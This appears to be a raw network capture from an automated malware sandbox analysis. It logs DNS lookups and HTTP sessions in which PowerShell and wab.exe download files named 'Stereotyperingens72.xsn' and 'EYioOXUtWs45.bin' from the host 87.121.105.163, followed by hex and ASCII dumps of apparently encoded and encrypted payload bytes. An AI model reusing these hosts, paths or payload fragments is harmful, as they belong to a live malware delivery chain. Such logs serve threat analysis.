                                                                            Apr 25, 2024 11:04:26.361032009 CEST1.1.1.1192.168.2.50x48d5No error (0)www.tyaer.com47.91.88.207A (IP address)IN (0x0001)false
                                                                            Apr 25, 2024 11:04:41.991966963 CEST1.1.1.1192.168.2.50x588fNo error (0)www.oyoing.com127.0.0.1A (IP address)IN (0x0001)false
                                                                            Apr 25, 2024 11:04:54.270534039 CEST1.1.1.1192.168.2.50x71c8No error (0)www.oyoing.com127.0.0.1A (IP address)IN (0x0001)false
                                                                            Apr 25, 2024 11:05:01.284907103 CEST1.1.1.1192.168.2.50x4ee0Name error (3)www.megabet303.lolnonenoneA (IP address)IN (0x0001)false
                                                                            • 87.121.105.163
                                                                            • www.tyaer.com
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.54970687.121.105.163804268C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Apr 25, 2024 11:03:00.130109072 CEST181OUTGET /Stereotyperingens72.xsn HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: 87.121.105.163
                                                                            Connection: Keep-Alive
                                                                            Apr 25, 2024 11:03:00.333404064 CEST1289INHTTP/1.1 200 OK
                                                                            Date: Thu, 25 Apr 2024 09:03:00 GMT
                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                            Last-Modified: Wed, 24 Apr 2024 08:57:40 GMT
                                                                            ETag: "631cc-616d3dce26900"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 405964
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
                                                                            Data Raw: 36 77 49 68 67 4f 73 43 67 31 69 37 35 54 38 62 41 4f 73 43 45 32 37 72 41 6d 73 62 41 31 77 6b 42 4f 73 43 30 34 58 72 41 6b 42 66 75 58 63 66 78 4c 74 78 41 5a 74 78 41 5a 75 42 38 63 6a 4c 38 6d 78 78 41 5a 74 78 41 5a 75 42 36 62 2f 55 4e 74 66 72 41 6e 76 63 63 51 47 62 63 51 47 62 36 77 4b 67 46 4c 70 66 69 31 6a 6f 63 51 47 62 36 77 4a 39 62 33 45 42 6d 2b 73 43 4c 2b 77 78 79 75 73 43 49 39 46 78 41 5a 75 4a 46 41 76 72 41 76 2b 50 63 51 47 62 30 65 4a 78 41 5a 74 78 41 5a 75 44 77 51 54 72 41 6f 4d 75 36 77 4a 56 4b 34 48 35 32 38 4b 4e 41 33 7a 4c 63 51 47 62 36 77 49 53 56 34 74 45 4a 41 54 72 41 76 62 78 63 51 47 62 69 63 50 72 41 74 65 59 36 77 49 4b 67 6f 48 44 41 42 58 44 41 48 45 42 6d 2b 73 43 71 2b 61 36 57 51 6b 58 53 4f 73 43 43 31 64 78 41 5a 75 42 77 6c 43 61 66 4c 39 78 41 5a 76 72 41 72 41 42 67 65 71 70 6f 35 4d 48 63 51 47 62 36 77 4c 65 7a 6e 45 42 6d 2b 73 43 76 44 31 78 41 5a 74 78 41 5a 75 4c 44 42 44 72 41 69 79 47 63 51 47 62 69 51 77 54 63 51 47 62 63 51 47 62 51 6e 45 42 6d 2b 73 43 41 32 4b 42 2b 72 41 2b 42 41 42 31 31 2b 73 43 6f 54 6a 72 41 6f 36 2f 69 56 77 6b 44 48 45 42 6d 33 45 42 6d 34 48 74 41 41 4d 41 41 48 45 42 6d 2b 73 43 7a 72 2b 4c 56 43 51 49 36 77 4a 45 4b 2b 73 43 66 52 2b 4c 66 43 51 45 36 77 49 2b 62 58 45 42 6d 34 6e 72 63 51 47 62 63 51 47 62 67 63 4f 63 41 41 41 41 36 77 4a 57 6a 6e 45 42 6d 31 4e 78 41 5a 74 78 41 5a 74 71 51 48 45 42 6d 33 45 42 6d 34 6e 72 36 77 4c 7a 67 2b 73 43 32 71 54 48 67 77 41 42 41 41 41 41 45 4b 77 44 63 51 47 62 63 51 47 62 67 63 4d 41 41 51 41 41 63 51 47 62 36 77 49 78 4f 46 4e 78 41 5a 76 72 41 75 42 78 69 65 74 78 41 5a 76 72 41 71 64 77 69 62 73 45 41 51 41 41 63 51 47 62 36 77 49 59 2f 49 48 44 42 41 45 41 41 48 45 42 6d 33 45 42 6d 31 4e 78 41 5a 76 72 41 6e 65 77 61 76 2f 72 41 70 4d 53 36 77 49 61 36 34 50 43 42 65 73 43 70 41 4c 72 41 73 63 32 4d 66 62 72 41 6c 6d 2f 63 51 47 62 4d 63 6c 78 41 5a 76 72 41 76 56 77 69 78 72 72 41 72 4c 5a 36 77 4a 36 41 30 48 72 41 6a 36 75 36 77 4b 58 39 54 6b 63 43 6e 58 79 63 51 47 62 63 51 47 62 52 75 73 43 49 42 6c 78 41 5a 75 41 66 41 72 37 75 48 58 64 63 51 47 62 63 51 47 62 69 30 51 4b 2f 4f 73 43 44 73 48 72 41 6b 38 4e 4b 66 44 72 41 71 58 34 36 77 49 77 33 76 2f 53 36 77 4c 32 70 6e 45 42 6d 37 71 77 50 67 51 41 36 77 4b 58 71 75 73 43 37 6f 34 78 77 4f 73 43 39 64 4c 72 41 74 68 62 69 33 77 6b 44 48 45 42 6d 2b 73 43 79 59 2b 42 4e 41 64 43 76 68 78 69 36 77 4c 75 37 75 73 43 75 6f 4b 44 77 41 52 78 41 5a 76 72 41 73 46 6a 4f 64 42 31 34 2b 73 43 4f 36 4e 78 41 5a 75 4a 2b 2b 73 43 53 55 68 78 41 5a 76 2f 31 2b 73 43 44 62 44 72 41 68 4b 47 4a 49 66 45 36 36 63 33 71 56 43 39 51 65 50 63 4b 69 65 42 79 73 4e 49 69 79 79 70 35 70 32 6b 6c 50 61 75 49 73 4e 51 79 58 39 72 6a 7a 57 57 79 51 73 75 6e 62 31 42 6d 61 73 58 4e 2f 6e 62 62 69 6b 36 35 73 4e 50 6d 33 50 32 6b 5a 32 6a 4d 75 7a 70 41 63 4a 42 39 2b 4f 44 51 7a 6f 61 73 6a 76 4d 57 70 4a 35 57 47 39 43 4c 75 47 4a 6a 39 6a 72 6f 39 6e 39 6e 53 5a 50 76 76 39 65 61 4a 61 64 44 6b 2b 2b 41 74 72 2b 57 5a 69 71 77 38 6f 52
                                                                            Data Ascii: 6wIhgOsCg1i75T8bAOsCE27rAmsbA1wkBOsC04XrAkBfuXcfxLtxAZtxAZuB8cjL8mxxAZtxAZuB6b/UNtfrAnvccQGbcQGb6wKgFLpfi1jocQGb6wJ9b3EBm+sCL+wxyusCI9FxAZuJFAvrAv+PcQGb0eJxAZtxAZuDwQTrAoMu6wJVK4H528KNA3zLcQGb6wISV4tEJATrAvbxcQGbicPrAteY6wIKgoHDABXDAHEBm+sCq+a6WQkXSOsCC1dxAZuBwlCafL9xAZvrArABgeqpo5MHcQGb6wLeznEBm+sCvD1xAZtxAZuLDBDrAiyGcQGbiQwTcQGbcQGbQnEBm+sCA2KB+rA+BAB11+sCoTjrAo6/iVwkDHEBm3EBm4HtAAMAAHEBm+sCzr+LVCQI6wJEK+sCfR+LfCQE6wI+bXEBm4nrcQGbcQGbgcOcAAAA6wJWjnEBm1NxAZtxAZtqQHEBm3EBm4nr6wLzg+sC2qTHgwABAAAAEKwDcQGbcQGbgcMAAQAAcQGb6wIxOFNxAZvrAuBxietxAZvrAqdwibsEAQAAcQGb6wIY/IHDBAEAAHEBm3EBm1NxAZvrAnewav/rApMS6wIa64PCBesCpALrAsc2MfbrAlm/cQGbMclxAZvrAvVwixrrArLZ6wJ6A0HrAj6u6wKX9TkcCnXycQGbcQGbRusCIBlxAZuAfAr7uHXdcQGbcQGbi0QK/OsCDsHrAk8NKfDrAqX46wIw3v/S6wL2pnEBm7qwPgQA6wKXqusC7o4xwOsC9dLrAthbi3wkDHEBm+sCyY+BNAdCvhxi6wLu7usCuoKDwARxAZvrAsFjOdB14+sCO6NxAZuJ++sCSUhxAZv/1+sCDbDrAhKGJIfE66c3qVC9QePcKieBysNIiyyp5p2klPauIsNQyX9rjzWWyQsunb1BmasXN/nbbik65sNPm3P2kZ2jMuzpAcJB9+ODQzoasjvMWpJ5WG9CLuGJj9jro9n9nSZPvv9eaJadDk++Atr+WZiqw8oR
                                                                            Apr 25, 2024 11:03:00.333421946 CEST1289INData Raw: 59 68 63 38 52 57 78 36 55 4e 76 6e 4d 37 77 63 59 70 6c 39 37 43 37 43 52 35 6e 6a 39 38 38 65 59 6b 4c 4d 6a 48 6e 57 50 75 61 72 77 78 4e 74 59 45 4b 2b 31 5a 44 58 45 4a 33 58 4d 37 77 63 59 71 48 65 53 55 6a 44 52 44 61 31 4a 2f 70 36 35 35
                                                                            Data Ascii: Yhc8RWx6UNvnM7wcYpl97C7CR5nj988eYkLMjHnWPuarwxNtYEK+1ZDXEJ3XM7wcYqHeSUjDRDa1J/p655LYmbEDQZETQL4cF7b/le/evxxi+0r2lupCnZOvxgehxnclssNP/xNhNHrngD/dHF+NAgR7ZyXv3r8cYskzgGNCvhPnG0HjncZ/eueah9QEx3acnJg+4s3GbZXnOr8cYssjUGNCviShtXnMAHqmT4qVjRhixlKVJwa
                                                                            Apr 25, 2024 11:03:00.333453894 CEST1289INData Raw: 69 73 74 37 44 2f 33 42 48 4e 61 73 4f 74 78 38 46 50 49 6b 49 45 55 61 68 35 48 2b 5a 72 2f 4e 4b 55 57 64 44 68 4d 76 74 32 78 6b 69 4e 78 6f 7a 53 56 36 55 45 33 4f 52 4d 31 6b 58 5a 41 76 68 79 4b 5a 4a 41 65 59 6f 34 32 51 74 34 6b 72 78 6b
                                                                            Data Ascii: ist7D/3BHNasOtx8FPIkIEUah5H+Zr/NKUWdDhMvt2xkiNxozSV6UE3ORM1kXZAvhyKZJAeYo42Qt4krxkEanVc117tIoevXHlWUlydr9MLdIAP+K/jdppv1KP1nVZmEgkW1XJTssyIJF6O5Z0uz2pqt4BPABmK0U10UqDtV+KVH7s5RkH7w4o4Xqxtc4rIvhhiTb8FUUK+La0xu/cCSGauGjD3pTOAOk1588D03UGOG8Os1mJ+
                                                                            Apr 25, 2024 11:03:00.333472967 CEST1289INData Raw: 5a 79 6f 35 68 31 33 34 45 32 41 5a 6a 6e 43 4a 65 6a 64 34 5a 4f 37 36 58 30 37 4a 61 71 34 37 4d 6d 61 64 49 35 50 2b 31 2f 61 62 2b 4b 34 34 4e 54 44 41 54 6d 37 49 44 72 6f 4c 63 57 2f 33 74 6b 61 33 78 66 34 7a 47 66 65 6e 78 43 67 6f 59 31
                                                                            Data Ascii: Zyo5h134E2AZjnCJejd4ZO76X07Jaq47MmadI5P+1/ab+K44NTDATm7IDroLcW/3tka3xf4zGfenxCgoY1u8FWTEyRzih72VrO1QjcYBgIsm3UGHxTEqt8OvA4tH8YOyohaxp1sR03Qr4cXm7tqMAOT5DcQj7WULTTd+ACHmazyIl1/+KP1kbLM0hgQr6lWVTqmjP7EMaP9T/t3Nm3b+ODBy9krz/dVc6rUjDeN/5jSCOZszusw
                                                                            Apr 25, 2024 11:03:00.333491087 CEST1289INData Raw: 42 47 76 73 59 51 45 6c 78 4a 6e 61 33 4b 73 71 4e 6c 4f 6a 33 63 66 33 51 43 77 50 6c 50 39 74 6e 4a 4e 41 56 4e 66 30 4a 59 67 72 34 50 2b 73 69 46 5a 76 43 34 37 55 4e 63 39 41 57 50 39 76 65 2b 4c 37 54 4d 74 34 33 2f 47 74 36 49 35 69 72 4e
                                                                            Data Ascii: BGvsYQElxJna3KsqNlOj3cf3QCwPlP9tnJNAVNf0JYgr4P+siFZvC47UNc9AWP9ve+L7TMt43/Gt6I5irNa8sqSqxGo3VbSGqQo9TnaqkjK6LQGSysjrpOnpJQ+OFoF0+uz/zHvyVtjXJA6VjQr5O2FbXfwrDfBgfe2WdoKxDP83DTBqHgkxM/steFXLf2CW6Oa2se99xG7RvAyfgdYUVnx6QKi7hteQdJD/j3NXmJKMY6KIWjP
                                                                            Apr 25, 2024 11:03:00.333544970 CEST1289INData Raw: 2f 47 75 75 6b 2f 38 44 71 52 49 56 56 58 73 44 6d 44 2f 75 65 69 76 6a 49 46 55 64 61 41 53 47 52 57 42 48 57 58 5a 64 2f 65 36 6b 38 7a 58 50 5a 31 64 76 4c 42 33 69 64 34 54 47 64 46 57 37 77 4c 31 62 51 6a 45 70 77 73 48 30 36 33 6f 6d 76 4e
                                                                            Data Ascii: /Guuk/8DqRIVVXsDmD/ueivjIFUdaASGRWBHWXZd/e6k8zXPZ1dvLB3id4TGdFW7wL1bQjEpwsH063omvNUgqyolHuYlpMk7bmBCvmlwqi/BYUJNE6V0vhxwXjogyBvkTtgJmWBiw0xkBbH0nZBx/5MoFSKVhUupgVuVzRs4/MAPbe1kwFByEEsxttjro888Q+ak5OPXDr8cYk2/CEZCvhqX3AgnPh5qVo5d9J1p3x1bDgNWqUZ
                                                                            Apr 25, 2024 11:03:00.333609104 CEST1289INData Raw: 4c 72 79 65 70 4f 38 53 30 75 4b 5a 73 52 45 4d 31 2f 41 2b 31 65 54 73 69 7a 4b 78 76 30 52 74 4d 45 70 68 73 4f 4b 4f 49 6f 55 70 69 68 74 51 30 67 48 59 6b 4b 4f 6e 38 62 76 2f 41 49 68 43 6b 49 35 6d 69 7a 58 65 52 4c 32 53 6b 48 5a 71 61 6d
                                                                            Data Ascii: LryepO8S0uKZsREM1/A+1eTsizKxv0RtMEphsOKOIoUpihtQ0gHYkKOn8bv/AIhCkI5mizXeRL2SkHZqamKRJNwqulV/+9LepnEhleQMD1c7dC0xrJB+EMfEOBO5jqkdl+LJoiDLO6XvpgRI5D7yMOKOGw/u/HjRprfIzYDStwFiHnDw3glKD+bnZTfsv6ky7C4hM2TJZXeu/VKCnOsDUytuW4LMxU96dDbrjyuZZck4CH2P8dC
                                                                            Apr 25, 2024 11:03:00.333642960 CEST1289INData Raw: 46 63 61 53 70 2b 50 52 63 31 41 59 55 65 79 4f 4f 78 49 67 68 48 4f 54 2f 76 44 6b 34 6f 4d 44 44 34 51 4e 77 5a 71 7a 2f 75 50 4b 7a 61 76 75 4f 77 48 6a 4e 39 43 65 36 41 36 36 4b 2f 44 50 38 6b 68 2b 55 56 51 66 73 6e 39 59 79 75 45 6a 6b 37
                                                                            Data Ascii: FcaSp+PRc1AYUeyOOxIghHOT/vDk4oMDD4QNwZqz/uPKzavuOwHjN9Ce6A66K/DP8kh+UVQfsn9YyuEjk7xmV7yO1655Hmelub5NB1AiXNFXXsuphQEoLCB4m7L2mdF5YwRdlfg3juYsTQgJHAnRn9V3qdiVO7Js0RNYFfQL4cbUN6/2JCgXrDhbITyDVZv3EHMTsISrdIUmxl+dsGWeMyEgadz/RdMZZxr95X07BoE3eiarMS7
                                                                            Apr 25, 2024 11:03:00.333662987 CEST1289INData Raw: 6b 47 63 49 42 71 32 4f 68 58 68 6c 62 58 78 30 6a 62 73 73 37 49 47 4e 43 76 6b 76 64 56 33 49 33 58 38 4e 52 46 45 6b 78 6f 4a 32 4e 54 78 36 6b 66 42 49 69 6c 59 4a 44 68 6f 45 45 78 33 64 6f 64 62 54 4e 48 51 68 33 75 71 39 57 4c 4e 55 64 71
                                                                            Data Ascii: kGcIBq2OhXhlbXx0jbss7IGNCvkvdV3I3X8NRFEkxoJ2NTx6kfBIilYJDhoEEx3dodbTNHQh3uq9WLNUdqZVswVUxp9ooDyDD1KUvKcjxgK9T6PW+fUu2lKB6WUTjP8JY6kK+E+ZF0BxiHbEcdLO+HE0aUGNGx5pVxzWZs95RjoZnydSHdu2Cuj/yIWmN+tIO6vxxPHxksKPsQLEcvde+HFGV+eDYAaFjsIgDkwn5deg+/4gRe2
                                                                            Apr 25, 2024 11:03:00.333734035 CEST1289INData Raw: 69 52 42 32 55 41 35 45 58 7a 6e 46 77 31 33 35 75 33 49 45 65 33 52 48 42 4d 64 73 51 32 31 44 72 6a 46 69 51 72 66 51 7a 68 42 39 75 77 64 30 37 46 36 70 66 64 39 53 4d 50 41 2f 37 31 61 54 62 35 76 6a 67 55 59 61 46 2f 38 2f 39 30 6a 62 32 63
                                                                            Data Ascii: iRB2UA5EXznFw135u3IEe3RHBMdsQ21DrjFiQrfQzhB9uwd07F6pfd9SMPA/71aTb5vjgUYaF/8/90jb2cZtQ4iNYkKqr7TdX0+ureCz0C+8EYDIu+8sgPaNlzq3YY6+aGlceeA9LMkjxGNCvpXnS7wcYvpPbm+jsdtaYL4cTedsowvTd3JorXqAkuT50AhQAvVa4Y+hfsWmz0zbVat+DokGT2rFvFsPi2sBuN4TY3TbHGJ1BIA
                                                                            Apr 25, 2024 11:03:00.535932064 CEST1289INData Raw: 69 6d 54 44 37 56 7a 74 4a 56 71 71 53 39 42 6b 55 74 42 73 68 43 63 77 4e 49 71 45 59 59 59 6a 70 72 38 68 6b 49 61 4e 38 49 30 79 51 74 6a 59 30 4b 2b 45 32 4b 5a 30 52 78 69 66 2b 6e 72 59 66 61 51 51 57 74 37 65 43 35 74 54 77 4d 62 2f 54 43
                                                                            Data Ascii: imTD7VztJVqqS9BkUtBshCcwNIqEYYYjpr8hkIaN8I0yQtjY0K+E2KZ0Rxif+nrYfaQQWt7eC5tTwMb/TC/Nlt8GnK7eocTBb1uROvHdR1iQnLItNJpok7XhCDkp/C3A4aEO+6xzwL1A2jQVBSnSbpUwwQu0wIZU3Urt8wzf5HoKQb7qvpivixriwZ4nRMZHbtvek97DH+JEgZPZ8YpKXqKEohXd6FP03eNU0Q6i1H+H3RK/stY


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.54971387.121.105.163801436C:\Program Files (x86)\Windows Mail\wab.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Apr 25, 2024 11:03:38.591876984 CEST175OUTGET /EYioOXUtWs45.bin HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: 87.121.105.163
                                                                            Cache-Control: no-cache
                                                                            Apr 25, 2024 11:03:38.800884008 CEST1289INHTTP/1.1 200 OK
                                                                            Date: Thu, 25 Apr 2024 09:03:38 GMT
                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                            Last-Modified: Wed, 24 Apr 2024 08:49:46 GMT
                                                                            ETag: "43440-616d3c0a1be80"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 275520
                                                                            Content-Type: application/octet-stream
                                                                            Data Raw: b4 f5 75 6c 80 94 93 9b 9d df 5a 0d dc a9 da 6e dd 12 00 35 99 a3 18 d5 45 e0 87 76 3c 75 f2 6e ec 72 35 ef 7b 08 77 76 85 22 ad 56 ad 6b fa ce d3 3d 18 1a 93 46 5d ae ed d1 2e 35 4a 8e ba a9 48 f4 37 dd d6 04 c1 fa b3 7f b1 06 e3 1f 7b 27 3c 0e ce 69 a9 bc 7f c7 47 60 8c 60 b8 1c f4 15 75 8f 11 cb 63 6c a1 68 60 e4 8a a2 ea 81 ea 82 97 8d e8 ff a9 b3 aa 3b c4 cb 5b ac 95 35 5e 1f 43 f5 f8 f7 b7 78 f6 58 4c cd f9 fa f7 0a aa d4 25 11 a6 82 98 a8 21 42 31 1a b2 e2 58 6f 0d 40 bc f0 88 d2 d0 c7 7a ee ea fb d3 c3 83 4f 95 90 3f ef 14 7f d4 99 6f 80 56 3d e2 25 e4 f0 6a 1f 24 79 ea 42 a7 1a 77 67 26 b3 cf 97 cc a8 2b 78 c4 10 fc 4b f5 fc f1 27 a5 8a 33 b6 8e e9 88 36 2c 62 ae 49 81 59 89 7f 1f 57 56 19 9d 02 ca 34 4e 3c 77 e3 7a 47 55 d3 7d f9 de 1e 3d 08 57 77 bc d7 6f 9b bf ce 8f 90 c9 48 f8 68 6f f0 93 d1 f6 79 2d 7c 30 1d 48 42 f8 f0 19 d2 fa 08 ec d3 8a 31 5c 28 35 63 84 a5 7b e7 a7 e0 57 51 45 a7 9c e1 86 ca ef c0 29 64 6f 3c 0d ed ca c6 e8 f9 25 b6 f0 3f 77 93 72 83 b6 69 25 ff 4b b1 e5 40 c4 64 14 65 0b 71 02 da c6 50 5c e0 ed 5b d5 d0 29 f4 01 13 31 d0 6a 52 ee a7 e2 44 cd f9 14 fb 7a 7b a7 da 65 ae 4c 87 72 30 ec c5 6e e1 0f 0b 02 d2 cc 13 fc a6 0f 3a 3e d4 66 78 83 cd 67 eb a5 f2 d0 83 a3 38 fa 56 94 c1 d4 dd 47 e9 d2 78 88 bf a8 0e 8a e9 ee 61 17 a6 66 57 06 61 df e1 80 6c 8e 09 97 08 e5 90 ca 35 b6 21 11 9e 01 5b a8 cc ef 3d d4 22 51 b9 a7 09 24 2e be 57 f7 1a e4 c1 41 79 65 04 fb 7c 47 48 dc 9b 9b 5b 6e 91 6f 4e de eb 26 12 e8 18 f1 22 5a 06 44 53 69 b0 70 b3 ea 28 dc 12 1a 83 8a 5c 4e db ae 6c 1d d6 97 e5 d7 74 28 c7 5d dc 61 67 7a b5 ae e8 62 12 a4 ae bd 21 d1 d8 dd 1f 40 98 f0 56 84 37 fe 0d e4 c3 02 c5 a6 88 5a cf 3c 7b 8e a1 2b 27 c8 07 67 3b 69 78 be c1 b3 90 d7 9d 02 37 7c 70 91 19 c7 95 d5 7f b9 c2 64 36 86 14 a8 69 c2 27 39 ad 6e c5 d3 07 66 1a 03 5f b0 5f 5a 4a 42 a0 50 94 01 5c aa 3f 6b 8d 14 12 f7 9b 3e b5 d1 f6 8b 2c 64 bb 4e a3 37 25 1a 22 b2 05 45 a0 2c b3 fe e5 6e 7f 35 5e 25 2d 05 e8 66 10 fe 74 e2 22 3f e5 7e 86 f6 d8 0e fa 81 6d 1e 0f f2 b3 5f 78 5d 2a 93 4a b7 b8 5a 19 5a ea 3d 1d 59 b4 2d 64 84 3e 79 08 fb 02 66 51 d3 a7 1c 11 8d 53 63 60 63 a7 9d ad 90 79 d7 ad aa 21 78 a5 23 8e d5 d7 25 9b dd c2 45 6c c0 1c e1 27 77 54 17 37 33 e1 8c 63 0b c4 31 d9 29 a6 88 63 20 6d ce d9 76 74 f5 8b 38 c7 79 24 04 55 bb e2 85 36 ff 2e 02 a9 73 ec 1d 11 b6 4a 27 bd 9d a9 81 70 0a 2b 84 32 b0 a3 2b 1b ce 31 63 7a ce f2 b3 d8 4b 6e 0b 53 75 d2 58 8a 23 cd 39 02 16 f7 93 1e 72 f0 1b 71 bb b3 33 a5 05 67 ec f9 4a 59 c2 76 1a bb aa d9 b3 69 81 e4 22 9b 05 49 8f e0 60 9e aa c5 c8 59 55 c6 0b 55 2c 1f 83 17 a8 ee 4e 4e fd d2 a6 a3 03 76 04 87 12 14 35 0a a8 98 40 dc 28 84 d2 48 3a aa 7b a0 63 3b 51 03 38 da dd b6 2d c6 28 5e 5d 4b 60 d8 08 42 d6 d4 fa 33 6c b2 d3 f4 87 2a a5 04 bb 9a d2 d3 35 cb 05 68 38 5e 61 bb ad 95 e3 41 b5 1d b2 8d 30 9a a7 0e 47 ba 75 20 62 1d 4f ec 3c 74 dc 81 0c 1f c3 9b 4d 38 4f 85 bc f2 58 cf fe 2c d4 b7 6d b0 d3 58 ce a0 ca 03 d9 da 75 07 50 d8 b5 98 e1 44 42 d2 33 de 7c d2 b8 d5 4e fc ed 1f 6a a7 8c 59 54 da 08 61 30 09 3b 8c 52 a9 6d 7f 00 01 2e 89 90 a8 37 e0 3e d6 2c 4d b7 c2 c1 e7 77 4a cd 78 af 03 8c 3d f1 ee a1 0d 8d 69
                                                                            Data Ascii: ulZn5Ev<unr5{wv"Vk=F].5JH7{'<iG``uclh`;[5^CxXL%!B1Xo@zO?oV=%j$yBwg&+xK'36,bIYWV4N<wzGU}=WwoHhoy-|0HB1\(5c{WQE)do<%?wri%K@deqP\[)1jRDz{eLr0n:>fxg8VGxafWal5![="Q$.WAye|GH[noN&"ZDSip(\Nlt(]agzb!@V7Z<{+'g;ix7|pd6i'9nf__ZJBP\?k>,dN7%"E,n5^%-ft"?~m_x]*JZZ=Y-d>yfQSc`cy!x#%El'wT73c1)c mvt8y$U6.sJ'p+2+1czKnSuX#9rq3gJYvi"I`YUU,NNv5@(H:{c;Q8-(^]K`B3l*5h8^aA0Gu bO<tM8OX,mXuPDB3|NjYTa0;Rm.7>,MwJx=i
                                                                            Apr 25, 2024 11:03:38.800937891 CEST1289INData Raw: cd 09 c4 62 68 b4 a2 24 62 ac 90 50 69 63 1d d3 a1 f9 cc 19 5a 37 4d d2 97 02 cb cb 3a eb f2 60 be ce 0f 81 65 34 ab d0 98 a1 3d 73 5b a4 5f 4a b0 3f 93 7a 7d 49 22 1d b3 7f 74 95 dc 87 d4 bc 33 0b 1b 71 8c c8 ec 39 cc 6b 7b e2 88 00 15 c7 d6 f5
                                                                            Data Ascii: bh$bPicZ7M:`e4=s[_J?z}I"t3q9k{-< v|)~qUqr>'22Ei}ocYuclh`;[-5^MBmu:+LbF0Pw9c/Rpbr=%j]xzd
                                                                            Apr 25, 2024 11:03:38.801074982 CEST1289INData Raw: b0 52 80 70 1a fa 94 62 8a 72 3d e2 25 e4 f0 6a 1f 5d 78 e3 e2 9a 7a 10 94 1b d3 a8 64 f1 c8 4c 8b de b6 54 b8 cf 9c 96 d4 bf 2c 99 45 b2 89 ef c5 36 c4 05 ba bd 39 ee 8c 4d 3e 35 71 a0 62 ad c7 4e 3c 77 e3 7a 47 55 d3 2d bc de 1e 71 09 56 77 6e
                                                                            Data Ascii: Rpbr=%j]xzdLT,E69M>5qbN<wzGU-qVwnbHhx&|0?LB:$\(5s{WQ)di<#?wr)!K@deqB[PLK)1jRDz{eLr0n:>fxg8VGx
                                                                            Apr 25, 2024 11:03:38.801094055 CEST1289INData Raw: 13 fc a6 0f 3a 3e d4 66 78 83 cd 67 eb a5 f2 d0 83 a3 38 fa 56 94 c1 d4 dd 47 e9 d2 78 88 bf a8 0e 8a e9 ee 61 17 a6 66 57 06 61 df e1 80 6c 8e 09 97 08 e5 90 ca 35 b6 21 11 9e 01 5b a8 cc ef 3d d4 22 51 b9 a7 09 24 2e be 57 f7 1a e4 c1 41 79 65
                                                                            Data Ascii: :>fxg8VGxafWal5![="Q$.WAye|GH[noN&"ZDSi^P}J|t(]agzb!@V7Z<{+'g;ix7|pd6i'9nf__ZJBP\?k>,dN7%
                                                                            Apr 25, 2024 11:03:38.801119089 CEST1289INData Raw: a7 98 0b 5a 4a 71 7b e8 91 9d fe 26 c8 82 8e c5 d3 0d 9c b5 7f 10 1f 94 2f ae ce a5 c9 2a da 6f 2e 5a ea b9 5f d3 38 ab ed ed bb 3d df df 17 21 e8 66 1f 7b f1 e2 22 3f a3 c6 d0 a3 8d 5b 0d 6f e6 dc ce 1a ac 5c ba d6 e4 1e 4e f7 93 92 6c 5b ac bc
                                                                            Data Ascii: ZJq{&/*o.Z_8=!f{"?[o\Nl[T-dJ+[o<+C=yL=PS.&dlJ(QGa34PGM,Bm.l$RrdfAnSYX#NUWZz4Z2"yC
                                                                            Apr 25, 2024 11:03:38.801176071 CEST1289INData Raw: 70 30 b9 ce b6 b0 63 06 8c ed bf cb a7 8b 61 1a bb d6 00 d9 69 eb e4 af 1e e9 b7 70 1f 30 61 1f 1d 33 a6 aa 4b 8e 09 d3 e0 7c 47 40 62 5e 4e fd 51 62 b7 8a f3 14 7a ed eb b8 43 a8 20 7f da cf e7 25 25 e2 6b 81 a4 e8 f9 90 eb 27 d9 1f 3f 68 1e 5d
                                                                            Data Ascii: p0caip0a3K|G@b^NQbzC %%k'?h]$&)>4x2(JrhGL0"<t<jdWZiKRu,=^lBj&1O=eMKuNear$.XJ\;Nnc+5Y',
                                                                            Apr 25, 2024 11:03:38.801207066 CEST1289INData Raw: c2 3b e4 77 b5 78 5c 50 fc 73 d5 75 ef a1 0d 06 dc e9 f6 3b 9d eb 70 b6 a5 a4 fc 50 52 69 ea 68 2f 1f f5 92 19 5a 8f 6a 7c e3 6d 3c 25 fb 11 f4 eb 4c 0f e1 9e 66 c6 de 3d 15 24 8d 88 a4 5b 37 62 b4 3f 93 2a 95 f0 d0 e2 4c f4 01 69 5f 43 dc 43 e5
                                                                            Data Ascii: ;wx\Psu;pPRih/Zj|m<%Lf=$[7b?*Li_CC' I|hP-o+B~i/]2,V}og&HT?Dh9"gek@m*]8\\b?WSa\iPw9Ia>J'hGJpS=
                                                                            Apr 25, 2024 11:03:38.801276922 CEST1289INData Raw: e7 f4 bc d8 61 f2 e0 f3 87 dc fa a9 36 ae 3f b8 e9 8a 52 80 ca aa fa 94 62 1a 49 f7 ed 69 2e b8 1f e7 d6 25 37 6b d7 82 91 6f bb e5 a8 64 8c e7 0f 33 4d 92 1d 2a 38 77 95 07 7e d6 9b ce 70 48 07 da 35 06 88 b6 78 39 ee 8c 4d 15 fd fa 63 49 6c b2
                                                                            Data Ascii: a6?RbIi.%7kod3M*8w~pH5x9McIlOqUQhWCg9Gzqn[K3BHO]8*pF.*|pp})VN`OoN|I!C@I([LniNRV4O]dnm3&l~T~=_
                                                                            Apr 25, 2024 11:03:38.801294088 CEST1289INData Raw: 66 33 7a ad 86 f2 99 6f b2 9e e5 04 52 c8 bd 81 dd 46 77 4a 5c 6c 69 6c 12 78 83 cd de 0b dc f2 d0 39 cc 38 fa 56 17 39 bb d2 0b 2b 9b 0d 7f 8c 57 49 32 8e 88 07 71 51 89 96 fc 63 54 23 41 84 91 0a 55 85 e9 10 c9 fc 3d e6 3a 5f 74 5a ef 4d 10 f4
                                                                            Data Ascii: f3zoRFwJ\lilx98V9+WI2qQcT#AU=:_tZM"Q}rWNA&JZi7%HIDM^7YEl5h!/t((!mRwBVx<D6Zw7bPbp!pmC8#w.o_ZJt\
